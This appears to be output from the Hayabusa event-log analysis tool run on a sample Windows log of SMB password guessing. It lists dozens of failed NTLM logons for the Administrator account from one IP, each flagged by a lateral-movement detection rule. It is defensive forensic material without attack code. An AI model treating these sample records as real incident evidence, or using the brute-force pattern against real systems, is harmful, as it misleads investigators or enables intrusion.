2016-09-20 01:51:08.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dM84lQYVfHhZmgpK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O5FrdBbYXWaqFkeb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZxiNMjsd3YfoCNa2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v1u5uD9SiDFq9VOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.675 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pZv9l3b7U8tIVmw8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.716 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7EfPqiBhm6hRX700 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.763 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3uvqgri2KGIDAlg1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oLXZMXKsjOaurgZV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nXtiRWHDJqpq69Ej : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.915 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OeC1T9YkT1hXMcGG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YPf6nlwAeuu7cf00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fvVUozD2RuIchN4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KP3rghcrgas3l3q1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MMtcQYoVoM57gTcj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IFjTWECEep09Abjt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.177 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jUlguy8tKBo4DSUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GETwMERLpiVtMRkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bhas9Vjc193EVcOg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OmVAnxq39t7qbcEs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 13y2nnltjipwZqth : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wDQrPBL1VodIcQLR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0Mp4jXeHd3b0CLw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3j89GmIDnG4v7JJC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.512 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyRLZMoaXJUrPPfn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.607 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZcoyOKUjEi1uCSpD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jWQGVJLcVwgf4YJ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mrFqG85mmjTYJ4A9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6DqIh1QHTk470nrU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feVbA94p6iT2pBeC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T30YHcE8ZG7FaxW7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RaKHRwYtx2lGtOCG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zDEDuMmlDZZfdkFD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CObqGJQi1hOOI83J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.002 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhsE9bQeEwW21bAj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: El1qxgjvGS0QSS4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vtlr3HwzJcAfSxuO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.141 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KDayr44iXmE63vqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkNoLVOhnS8ayujK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3ggg78jjziKqijrT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BodeSVqeqa5qBQDL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.362 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yY7yxEcuGwWSJZV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.406 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oTlg6cvsz6Z6QpCp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3pTALzqu4Ok6CUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kdGagQIEcvQQMp4n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fVu4reOyQEIkChHO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.609 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EJWNS69MmMGLSnHc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nPaR2sBxPPCjxpL0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kJJ9A1EfqM4V2TRv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4dxf59xjpxO3oG17 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6dMI12g4tjSF8PX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZAqN0xPaW4jg2Kjc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mcnReyIEaqsQfowV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: akOH8Y7XdjOpqTez : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b0HOK1TIqloud7gh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n6uIAK55BmTnA6Bf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZDnn6QmLOJ6KwzKt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: np8KaRJvRqBrGyFL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dxbu69Amr6gWN5Hw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LoZdaFJWNON8Ujnc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q4RSlXgOS7sssCqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2PJprE7olK4pjrx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jQOAUcWQL32y2gGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nXI0wWwzhHN0uvOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ujGqTzfOhmKgoAjt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cFoPtWZ03O3ZZgOC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EyO2VTnpGZLeSIvr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ua69MEWABQ9hsooT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ubPQWn4nQYr3rXr8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xrgATdNqkA44nKqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKwktiUfTWakNx3I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVebPFnWhbZKIANs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IyV8stIvfXLJQpsn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uStfvm0y0eZrWONH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUwTyUXe8NLG7bCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HQuDp8aZpWDANKMe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
